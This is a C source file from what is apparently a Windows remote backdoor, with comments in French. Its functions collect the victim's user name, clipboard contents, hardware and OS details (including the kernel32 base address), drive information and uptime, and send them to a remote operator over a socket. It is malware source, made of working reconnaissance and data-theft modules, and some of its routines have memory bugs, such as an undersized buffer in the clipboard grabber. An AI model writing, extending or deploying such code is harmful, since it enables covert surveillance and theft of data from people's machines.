#include "rbackdoor.h"

/************************************************************************/
/*  WHOAMI : Permettant de voir quel utilisateur est logg              */
/************************************************************************/

int SendUserName(void)
{
	char *acUserName=NULL;
	DWORD nUserName;

	nUserName = 256;

	acUserName = (char *)GlobalAlloc(GPTR, nUserName);

	if (GetUserName(acUserName, &nUserName) == 0) {
		DisplayMessage("Erreur lors de la tentative d'obtention de l'user logue.", 0);
		GlobalFree(acUserName);
		return -1;
	}

	rsend(ConnectSocket, "Current User: ");
	rsend(ConnectSocket, acUserName);
	rsend(ConnectSocket, "\n");
	GlobalFree(acUserName);

	return 0;
}

/************************************************************************/
/*  CLIP : Recupre le contenu du ClipBoard                             */
/************************************************************************/

int Clip(void)
{
	char *buffer=NULL, *strbuffer=NULL;
	if(OpenClipboard(NULL))	{
		buffer = (char*)GetClipboardData(CF_TEXT);
		strbuffer = (char *)GlobalAlloc(GPTR, sizeof(buffer)+1);
		CheckMemory(strbuffer);
		sprintf(strbuffer, "\n%s\n", buffer);
		GlobalFree(buffer);
		rsend(ConnectSocket, strbuffer);
		GlobalFree(strbuffer);		
	}
	return 0;
}

/************************************************************************/
/*  SYSINFO : Recupre un lot d'informations sur le systme distant     */
/************************************************************************/

int Proc_GetSysInfo(void)
{
	/* Recupere et affiche l'heure du systeme serveur */
	rsend(ConnectSocket, "\n");
	Proc_Time();
	rsend(ConnectSocket, "\n");
	/* Recupere et affiche le type de processeur present sur le systeme cible */
	Proc_GetCpuType();
	/* Recupere et affiche la version de l'os */
	Proc_GetOsVersion();
	/* Recupere le nom de l'ordinateur */
	Proc_GetHostName();
	/* Recupere les informations sur la memoire */
	Proc_GetMemoryInfo();
	/* Recuperer la resolution de l'ecran */
	Proc_GetScreenResolution();

	return 0;
}

/************************************************************************/
/*  Fonction permettant de recuprer des informations sur le processeur */
/************************************************************************/

int Proc_GetCpuType(void)
{
	HKEY hKey;
	LONG result;
	DWORD data, dataSize;
	SYSTEM_INFO system_info;
	static long g_pagesize;
	char cpuname[1024];
	char *buffer=NULL;
 
	g_pagesize = 0;
	
	buffer=(char *)GlobalAlloc(GPTR,1024);
	CheckMemory(buffer);
	
	result = RegOpenKeyEx (HKEY_LOCAL_MACHINE,"Hardware\\Description\\System\\CentralProcessor\\0", 0, 0x0001, &hKey);
	if (result == ERROR_SUCCESS) {
		result = RegQueryValueEx (hKey, "~MHz", NULL, NULL,(LPBYTE)&data, &dataSize);
		sprintf(buffer, " > Processor Speed : %d Mhz\n\n", data);
		rsend(ConnectSocket, buffer);
		dataSize = 1024;
		result = RegQueryValueEx (hKey, ("ProcessorNameString"), NULL, NULL, (LPBYTE)&cpuname, &dataSize);
        sprintf(buffer, " > Processor Name : %s\n\n", cpuname);
		rsend(ConnectSocket, buffer);
		RegCloseKey(hKey);
	}

	
	GetSystemInfo (&system_info);
	g_pagesize = system_info.dwProcessorType;
	
	switch(g_pagesize)
	{
		case PROCESSOR_INTEL_386: rsend(ConnectSocket, " > Processor Type : INTEL 386\n\n");
			break;
		case PROCESSOR_INTEL_486: rsend(ConnectSocket, " > Processor Type : INTEL 486\n\n");
			break;
		case PROCESSOR_INTEL_PENTIUM: rsend(ConnectSocket, " > Processor Type : INTEL PENTIUM\n\n");
			break;
		case PROCESSOR_MIPS_R4000: rsend(ConnectSocket, " > Processor Type : MIPS R4000\n\n");
			break;
		case PROCESSOR_HITACHI_SH3: rsend(ConnectSocket, " > Processor Type : HITACHI SH3\n\n");
			break;
		case PROCESSOR_HITACHI_SH4: rsend(ConnectSocket, " > Processor Type : HITACHI SH4\n\n");
			break;
		case PROCESSOR_STRONGARM: rsend(ConnectSocket, " > Processor Type : STRONGARM\n\n");
			break;
		case PROCESSOR_ARM720: rsend(ConnectSocket, " > Processor Type : ARM720\n\n");
			break;
	}
	g_pagesize = system_info.dwNumberOfProcessors;
	sprintf(buffer, " > Number of processor : %i\n\n", g_pagesize);
	rsend(ConnectSocket, buffer);
	GlobalFree(buffer);

	return 0;
}

/************************************************************************/
/*  Fonction permettant de recuprer l'hostname d'hote du pc distant    */
/************************************************************************/

int Proc_GetHostName(void)
{
	char *buffer=NULL;
	TCHAR szComputerName[MAX_COMPUTERNAME_LENGTH + 1];
	DWORD dwSize = MAX_COMPUTERNAME_LENGTH + 1;
	
	buffer = (char *)GlobalAlloc(GPTR, sizeof(szComputerName)+21+1);
	CheckMemory(buffer);
	
	GetComputerName(szComputerName, &dwSize);
	sprintf(buffer, " > Computer Name : %s\n\n", szComputerName);
	
	rsend(ConnectSocket, buffer);
	GlobalFree(buffer);

	return 0;
}

/************************************************************************/
/*  Fonction permettant de recuprer des informations sur l'OS          */
/************************************************************************/

int Proc_GetOsVersion(void)
{
	DWORD KernelAddr;
	OSVERSIONINFO info;
	DWORD dwProcVersion;
	char *buffer = NULL;
	
	dwProcVersion = GetProcessVersion(0);
	info.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
	GetVersionEx(&info);    

	switch(info.dwPlatformId)
	{
		case VER_PLATFORM_WIN32s: rsend(ConnectSocket, " > OS Version : Win32s on Windows 3.1\n\n");
			break;
		case VER_PLATFORM_WIN32_WINDOWS: rsend(ConnectSocket, " > OS Version : Win32 on Windows 95 or Windows 98\n\n");
			break;
		case VER_PLATFORM_WIN32_NT: rsend(ConnectSocket, " > OS Version : Win32 on Windows NT\n\n");
			break;
		default: rsend(ConnectSocket, " > OS Version : ?????");
			break;
	}

	KernelAddr = 0;
	KernelAddr = (DWORD)GetModuleHandle("kernel32.dll");

	buffer = (char *)GlobalAlloc(GPTR, 1024);
	CheckMemory(buffer);
    sprintf(buffer, " - Major Version:\t\t%d\n - Minor Version:\t\t%d\n - Build Number:\t\t%d\n - Version:\t\t%s\n - Kernel Base:\t\t\t0x%8.8X\n\n", info.dwMajorVersion, info.dwMinorVersion, info.dwBuildNumber, info.szCSDVersion, KernelAddr);
	rsend(ConnectSocket, buffer);
	GlobalFree(buffer);

	return 0;
}

/************************************************************************/
/*  Fonction permettant de recuprer des informations sur la mmoire    */
/************************************************************************/

int Proc_GetMemoryInfo(void)
{
	char *buffer=NULL;
	MEMORYSTATUS mem;
	
	buffer=(char *)GlobalAlloc(GPTR,1024);
	CheckMemory(buffer);
	
	GlobalMemoryStatus(&mem);
	sprintf(buffer, " > Etat de la ram :\n  - Octets Libres : %d\n  - Memoire disponible : %d\n  - Pourcentage de la memoire utilisee : %d\n\n", mem.dwAvailPhys, mem.dwTotalPhys, mem.dwMemoryLoad);
	rsend(ConnectSocket, buffer);
	
	GlobalFree(buffer);
	return 0;
}

/**********************************************************************************************/
/*  Fonction permettant de recuprer des informations sur la rsolution de l'cran distant    */
/**********************************************************************************************/

int Proc_GetScreenResolution(void)
{
	char *buffer=NULL;
	POINT Ecran = { GetSystemMetrics(SM_CXSCREEN), GetSystemMetrics(SM_CYSCREEN) };
	
	buffer=(char *)GlobalAlloc(GPTR,512);
	CheckMemory(buffer);
	
	sprintf(buffer, " > Resolution : %d*%d\n\n", Ecran.x, Ecran.y);
	rsend(ConnectSocket, buffer);
	
	GlobalFree(buffer);
	return 0;
}

/***************************************************************************************/
/*  Fonction permettant de recuprer des informations sur les disques logiques, etc    */
/***************************************************************************************/

int Proc_GetDrivesInfos(void)
{
	DWORD dw,dw2,dw3,dw4;
	char c, *buffer, *InfoBuf;
	int x;

	buffer  = (char *)GlobalAlloc(GPTR, 1024);
	InfoBuf = (char *)GlobalAlloc(GPTR, 1024);
	
	for (c = 'C'; c <= 'Z'; c++)
	{
		wsprintf(buffer, "%c:\\", c);
		x = GetDriveType(buffer);
		strcat(buffer, " - ");
		switch (x)
		{
			case 0:
				strcat(buffer, "Unable To Determine.");
				break;
			case 1:
				buffer[0]='\0';
				break;
			case DRIVE_REMOVABLE:
				strcat(buffer, "REMOVABLE");
				break;
			case DRIVE_FIXED:
				strcat(buffer, "FIXED");
				wsprintf(InfoBuf, "%c:\\", c);
				if (GetDiskFreeSpace(InfoBuf, &dw, &dw2, &dw3, &dw4))
				{
					wsprintf(InfoBuf, "\tSec/Clust: %u Byts/Sec: %u Bytes free: %u/%u\n", (unsigned int)dw, (unsigned int)dw2, (unsigned int)(dw3*dw2*dw), (unsigned int)(dw4*dw2*dw));
					strlcat(buffer, InfoBuf, 1024);
				}
				break;
			case DRIVE_REMOTE:
				strcat(buffer, "REMOTE");
				break;
			case DRIVE_CDROM:
				strcat(buffer, "CD-ROM\n");
				break;
			case DRIVE_RAMDISK:
				strcat(buffer, "RAMDISK");
				break;
			default:
				strcat(buffer, "UNKNOWN TYPE");
				break;
		}
		if (strlen(buffer))
		{
			rsend(ConnectSocket, buffer);
		}		
	}

	GlobalFree(buffer);
	GlobalFree(InfoBuf);

	return 0;
}


/************************************************************************/
/*  Fonction permettant de recuprer l'uptime du pc distant             */
/************************************************************************/

void uptime(void)
{
	char *buffer=NULL;
	SYSTEM_TIME_INFORMATION Sti;
	LONG                    status;
	FILETIME                ftSystemBoot;
	SYSTEMTIME              stSystemBoot;
	
	NtQuerySystemInformation = (PROCNTQSI)GetProcAddress(GetModuleHandle("ntdll"),"NtQuerySystemInformation");
		
	if (!NtQuerySystemInformation)
		return;
	
	status = NtQuerySystemInformation(3,&Sti,sizeof(Sti),0);
	if (status!=NO_ERROR) {	
		return;
	}
	
	ftSystemBoot = *(FILETIME *)&(Sti.liKeBootTime);
	
	FileTimeToLocalFileTime(&ftSystemBoot,&ftSystemBoot);
	FileTimeToSystemTime(&ftSystemBoot,&stSystemBoot);

	buffer = (char *)GlobalAlloc(GPTR, 1024);
	CheckMemory(buffer);
	
	sprintf(buffer, "Date: %02d-%02d-%04d\nTime: %02d:%02d:%02d\n",
	stSystemBoot.wMonth,stSystemBoot.wDay,stSystemBoot.wYear,
	stSystemBoot.wHour,stSystemBoot.wMinute,stSystemBoot.wSecond);
	rsend(ConnectSocket, buffer);
	GlobalFree(buffer);
}

